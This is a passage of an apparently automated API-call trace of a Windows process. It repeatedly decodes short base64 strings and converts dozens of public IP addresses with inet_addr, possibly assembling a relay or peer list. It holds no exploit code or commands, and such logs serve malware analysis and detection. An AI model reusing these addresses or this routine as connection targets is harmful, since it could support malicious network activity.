pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.434] CryptStringToBinaryA (in: pszString="BZIIQYqF2upTcCf1SvnbigGv84E", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.434] malloc (_Size=0x74) returned 0x3d8b868 [0119.434] inet_addr (cp="159.89.174.9") returned 0x9ae599f [0119.434] CryptStringToBinaryA (in: pszString="BZdurJG8Z6bAYoR27iTawcw3ihA", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.434] CryptStringToBinaryA (in: pszString="BZdurJG8Z6bAYoR27iTawcw3ihA", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.434] malloc (_Size=0x74) returned 0x3d8ace8 [0119.434] inet_addr (cp="59.102.111.75") returned 0x4b6f663b [0119.435] CryptStringToBinaryA (in: pszString="BZgYnQNlcF/PBB4he4bSo+zfXnM", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.435] CryptStringToBinaryA (in: pszString="BZgYnQNlcF/PBB4he4bSo+zfXnM", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.435] malloc (_Size=0x74) returned 0x3d8b3e8 [0119.435] inet_addr (cp="151.30.159.248") returned 0xf89f1e97 [0119.435] CryptStringToBinaryA (in: pszString="Ba1JeEFI0ft4bO3F7TGkmCRC0nY", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.435] CryptStringToBinaryA (in: pszString="Ba1JeEFI0ft4bO3F7TGkmCRC0nY", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.435] malloc (_Size=0x74) returned 0x3d8abe8 [0119.435] inet_addr (cp="178.73.220.32") returned 0x20dc49b2 [0119.435] CryptStringToBinaryA (in: pszString="Ba1vSQYUInbGBlWMnDuIdrQ82Q8", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.435] CryptStringToBinaryA (in: pszString="Ba1vSQYUInbGBlWMnDuIdrQ82Q8", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d734d8, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d734d8, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.435] malloc (_Size=0x74) returned 0x3d8b468 [0119.435] inet_addr (cp="87.120.254.98") returned 0x62fe7857 [0119.435] CryptStringToBinaryA (in: pszString="BbL0i+yG3yh82TzqMJabolw8AHc", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.435] CryptStringToBinaryA (in: pszString="BbL0i+yG3yh82TzqMJabolw8AHc", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.435] malloc (_Size=0x74) returned 0x3d8ae68 [0119.435] inet_addr (cp="194.5.96.60") returned 0x3c6005c2 [0119.435] CryptStringToBinaryA (in: pszString="BbRRwFYv3iMwevqE/Wo3ZS5hUjM", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.435] CryptStringToBinaryA (in: pszString="BbRRwFYv3iMwevqE/Wo3ZS5hUjM", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.435] malloc (_Size=0x74) returned 0x3d8b668 [0119.435] inet_addr (cp="95.154.194.31") returned 0x1fc29a5f [0119.435] CryptStringToBinaryA (in: pszString="BblfoXoRHv6rpgbQJpzedhQXw5I", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.435] CryptStringToBinaryA (in: pszString="BblfoXoRHv6rpgbQJpzedhQXw5I", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.435] malloc (_Size=0x74) returned 0x3d8b4e8 [0119.436] inet_addr (cp="195.189.99.12") returned 0xc63bdc3 [0119.436] CryptStringToBinaryA (in: pszString="Bb7Hf0DexyxXy8090wQ56Fm45Ss", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.436] CryptStringToBinaryA (in: pszString="Bb7Hf0DexyxXy8090wQ56Fm45Ss", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.436] malloc (_Size=0x74) returned 0x3d8b568 [0119.436] inet_addr (cp="81.20.143.138") returned 0x8a8f1451 [0119.436] CryptStringToBinaryA (in: pszString="BcOD3IE8RktxMlaXIr5SQ6n/c1w", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.436] CryptStringToBinaryA (in: pszString="BcOD3IE8RktxMlaXIr5SQ6n/c1w", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.436] malloc (_Size=0x74) returned 0x3d8b6e8 [0119.436] inet_addr (cp="160.119.249.24") returned 0x18f977a0 [0119.436] CryptStringToBinaryA (in: pszString="BcYhtE72gziJrnt+KgtHZWnEfjc", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.436] CryptStringToBinaryA (in: pszString="BcYhtE72gziJrnt+KgtHZWnEfjc", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.436] malloc (_Size=0x74) returned 0x3d8b7e8 [0119.436] inet_addr (cp="193.135.10.219") returned 0xdb0a87c1 [0119.436] CryptStringToBinaryA (in: pszString="BdhfC1xyU8XvWW6vaRDrizFvc84", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.436] CryptStringToBinaryA (in: pszString="BdhfC1xyU8XvWW6vaRDrizFvc84", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.436] malloc (_Size=0x74) returned 0x3d8aa68 [0119.436] inet_addr (cp="188.120.235.117") returned 0x75eb78bc [0119.436] CryptStringToBinaryA (in: pszString="BdxdvvtlG8ApRtsyhvhdsbXSw9Y", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.436] CryptStringToBinaryA (in: pszString="BdxdvvtlG8ApRtsyhvhdsbXSw9Y", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.436] malloc (_Size=0x74) returned 0x3d8a968 [0119.436] inet_addr (cp="71.19.148.12") returned 0xc941347 [0119.436] CryptStringToBinaryA (in: pszString="Bd27dKq28Z4AMYhwKx5U8jA10GQ", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.436] CryptStringToBinaryA (in: pszString="Bd27dKq28Z4AMYhwKx5U8jA10GQ", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.437] malloc (_Size=0x74) returned 0x3d8a9e8 [0119.437] inet_addr (cp="37.48.120.47") returned 0x2f783025 [0119.437] CryptStringToBinaryA (in: pszString="Be7y9gKfcHNKxfZFV6ov43MGIU8", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.437] CryptStringToBinaryA (in: pszString="Be7y9gKfcHNKxfZFV6ov43MGIU8", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.437] malloc (_Size=0x74) returned 0x3d8aae8 [0119.437] inet_addr (cp="51.195.149.141") returned 0x8d95c333 [0119.437] CryptStringToBinaryA (in: pszString="BfW7ddoAc2HOA3cDkwM9TVKDbYo", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.437] CryptStringToBinaryA (in: pszString="BfW7ddoAc2HOA3cDkwM9TVKDbYo", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.437] malloc (_Size=0x74) returned 0x3d8bfe8 [0119.437] inet_addr (cp="185.220.101.204") returned 0xcc65dcb9 [0119.437] CryptStringToBinaryA (in: pszString="Bfsp7ricD5OokF3qJVc+YZmTxO4", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.437] CryptStringToBinaryA (in: pszString="Bfsp7ricD5OokF3qJVc+YZmTxO4", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.437] malloc (_Size=0x74) returned 0x3d8c068 [0119.437] inet_addr (cp="135.181.106.223") returned 0xdf6ab587 [0119.437] CryptStringToBinaryA (in: pszString="Bf6i2x/SneIptYnf716ApcbH7p4", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.437] CryptStringToBinaryA (in: pszString="Bf6i2x/SneIptYnf716ApcbH7p4", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.437] malloc (_Size=0x74) returned 0x3d8bc68 [0119.437] inet_addr (cp="163.172.58.2") returned 0x23aaca3 [0119.437] CryptStringToBinaryA (in: pszString="Bf+jnXHaEW92aepO5ToLrqMVun8", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.437] CryptStringToBinaryA (in: pszString="Bf+jnXHaEW92aepO5ToLrqMVun8", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d737d8, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d737d8, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.437] malloc (_Size=0x74) returned 0x3d8bde8 [0119.437] inet_addr (cp="85.93.218.204") returned 0xccda5d55 [0119.437] CryptStringToBinaryA (in: pszString="BhNwrkHBCEspEOsFIsiy2xwsuW4", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.438] CryptStringToBinaryA (in: pszString="BhNwrkHBCEspEOsFIsiy2xwsuW4", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.438] malloc (_Size=0x74) returned 0x3d8b968 [0119.438] inet_addr (cp="49.50.107.221") returned 0xdd6b3231 [0119.438] CryptStringToBinaryA (in: pszString="Bh4ElpMdI6gaK2hckznTaFfdD6E", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.438] CryptStringToBinaryA (in: pszString="Bh4ElpMdI6gaK2hckznTaFfdD6E", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.438] malloc (_Size=0x74) returned 0x3d8c268 [0119.438] inet_addr (cp="51.158.69.118") returned 0x76459e33 [0119.438] CryptStringToBinaryA (in: pszString="BkMtG1p8EyBxYm0YbX8aQpxbvtk", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.438] CryptStringToBinaryA (in: pszString="BkMtG1p8EyBxYm0YbX8aQpxbvtk", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.438] malloc (_Size=0x74) returned 0x3d8c868 [0119.438] inet_addr (cp="85.25.44.141") returned 0x8d2c1955 [0119.438] CryptStringToBinaryA (in: pszString="BkfD+DUrv6DVehw+Dc9n/D4HPSw", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.438] CryptStringToBinaryA (in: pszString="BkfD+DUrv6DVehw+Dc9n/D4HPSw", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.438] malloc (_Size=0x74) returned 0x3d8bd68 [0119.438] inet_addr (cp="185.165.168.168") returned 0xa8a8a5b9 [0119.438] CryptStringToBinaryA (in: pszString="Bk08TMG4VIObCXn+HC8Fq6t/nWg", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.438] CryptStringToBinaryA (in: pszString="Bk08TMG4VIObCXn+HC8Fq6t/nWg", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d73cb8, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d73cb8, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.438] malloc (_Size=0x74) returned 0x3d8c0e8 [0119.438] inet_addr (cp="104.244.73.126") returned 0x7e49f468 [0119.438] CryptStringToBinaryA (in: pszString="BlQWJA9S626PEz+OY6YuHQhvGgQ", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.438] CryptStringToBinaryA (in: pszString="BlQWJA9S626PEz+OY6YuHQhvGgQ", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.438] malloc (_Size=0x74) returned 0x3d8bae8 [0119.438] inet_addr (cp="46.22.104.116") returned 0x7468162e [0119.438] CryptStringToBinaryA (in: pszString="Bl5rIL+Hrm8OJwY7uK4ALsw3Nuk", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.439] CryptStringToBinaryA (in: pszString="Bl5rIL+Hrm8OJwY7uK4ALsw3Nuk", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.439] malloc (_Size=0x74) returned 0x3d8bee8 [0119.439] inet_addr (cp="51.89.6.40") returned 0x28065933 [0119.439] CryptStringToBinaryA (in: pszString="Bmc11D+0dvpkV4xdgp4XbfU+WgA", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.439] CryptStringToBinaryA (in: pszString="Bmc11D+0dvpkV4xdgp4XbfU+WgA", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d73d58, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d73d58, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.439] malloc (_Size=0x74) returned 0x3d8ba68 [0119.439] inet_addr (cp="92.252.63.10") returned 0xa3ffc5c [0119.439] CryptStringToBinaryA (in: pszString="BnffCwXs2i70XybDMycxBDu4mrg", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.439] CryptStringToBinaryA (in: pszString="BnffCwXs2i70XybDMycxBDu4mrg", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d73cf8, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d73cf8, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.439] malloc (_Size=0x74) returned 0x3d8bce8 [0119.439] inet_addr (cp="185.220.101.217") returned 0xd965dcb9 [0119.439] CryptStringToBinaryA (in: pszString="BoBOY4PulOg8lFPzmx5STCctbYQ", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.439] CryptStringToBinaryA (in: pszString="BoBOY4PulOg8lFPzmx5STCctbYQ", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.439] malloc (_Size=0x74) returned 0x3d8bb68 [0119.439] inet_addr (cp="109.70.100.7") returned 0x764466d [0119.439] CryptStringToBinaryA (in: pszString="Bp362oxl3qK5sichYK9eV5WPmpc", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.439] CryptStringToBinaryA (in: pszString="Bp362oxl3qK5sichYK9eV5WPmpc", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.439] malloc (_Size=0x74) returned 0x3d8b9e8 [0119.439] inet_addr (cp="157.22.22.254") returned 0xfe16169d [0119.439] CryptStringToBinaryA (in: pszString="Bp5zLslndO1WCdSAPXsRMOM4sOs", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.439] CryptStringToBinaryA (in: pszString="Bp5zLslndO1WCdSAPXsRMOM4sOs", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.439] malloc (_Size=0x74) returned 0x3d8c4e8 [0119.440] inet_addr (cp="188.242.52.59") returned 0x3b34f2bc [0119.440] CryptStringToBinaryA (in: pszString="BqtuhT6Nkp+dYOOkHvT5e3z2/aQ", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.440] CryptStringToBinaryA (in: pszString="BqtuhT6Nkp+dYOOkHvT5e3z2/aQ", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d73a98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d73a98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.440] malloc (_Size=0x74) returned 0x3d8c8e8 [0119.440] inet_addr (cp="176.114.248.47") returned 0x2ff872b0 [0119.440] CryptStringToBinaryA (in: pszString="Bqv8UT+nHH7kI9zGq/gPa0ovwaw", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.440] CryptStringToBinaryA (in: pszString="Bqv8UT+nHH7kI9zGq/gPa0ovwaw", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.440] malloc (_Size=0x74) returned 0x3d8bf68 [0119.440] inet_addr (cp="93.115.241.194") returned 0xc2f1735d [0119.440] CryptStringToBinaryA (in: pszString="BrMI9UtKd510swU2lkGCoJwIq48", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.440] CryptStringToBinaryA (in: pszString="BrMI9UtKd510swU2lkGCoJwIq48", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.440] malloc (_Size=0x74) returned 0x3d8c768 [0119.440] inet_addr (cp="51.161.43.236") returned 0xec2ba133 [0119.440] CryptStringToBinaryA (in: pszString="Brvqpvc3WaF5XrRh050qoWjzBdE", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.440] CryptStringToBinaryA (in: pszString="Brvqpvc3WaF5XrRh050qoWjzBdE", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.440] malloc (_Size=0x74) returned 0x3d8c7e8 [0119.440] inet_addr (cp="77.68.94.106") returned 0x6a5e444d [0119.440] CryptStringToBinaryA (in: pszString="BtD7nGhg6Nf7meoxCgFnB6+qcc4", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.440] CryptStringToBinaryA (in: pszString="BtD7nGhg6Nf7meoxCgFnB6+qcc4", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.441] malloc (_Size=0x74) returned 0x3d8bbe8 [0119.441] inet_addr (cp="154.57.3.214") returned 0xd603399a [0119.441] CryptStringToBinaryA (in: pszString="Btd+RhyYFCQ9osYUVUTVuztGtS4", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.441] CryptStringToBinaryA (in: pszString="Btd+RhyYFCQ9osYUVUTVuztGtS4", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, 